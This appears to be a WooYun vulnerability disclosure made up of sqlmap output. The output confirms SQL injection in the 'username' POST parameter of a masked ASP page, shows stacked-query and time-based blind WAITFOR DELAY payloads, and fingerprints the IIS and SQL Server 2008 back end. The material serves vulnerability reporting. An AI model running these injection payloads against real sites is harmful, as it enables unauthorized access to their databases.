WooYun.org

http://**.**.**.**/inter/guanzhu_userdetail_action.asp?Page=2&act=post&username=QQ897032171

POST parameter 'username' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] y
sqlmap identified the following injection points with a total of 444 HTTP(s) req
uests:
---
Place: POST
Parameter: username
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Page=2&act=post&username=QQ897032171'; WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Page=2&act=post&username=QQ897032171' WAITFOR DELAY '0:0:5'--
---
[00:25:32] [INFO] testing Microsoft SQL Server
[00:25:32] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
[00:26:17] [INFO] confirming Microsoft SQL Server
[00:26:27] [INFO] adjusting time delay to 4 seconds due to good response times
[00:26:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008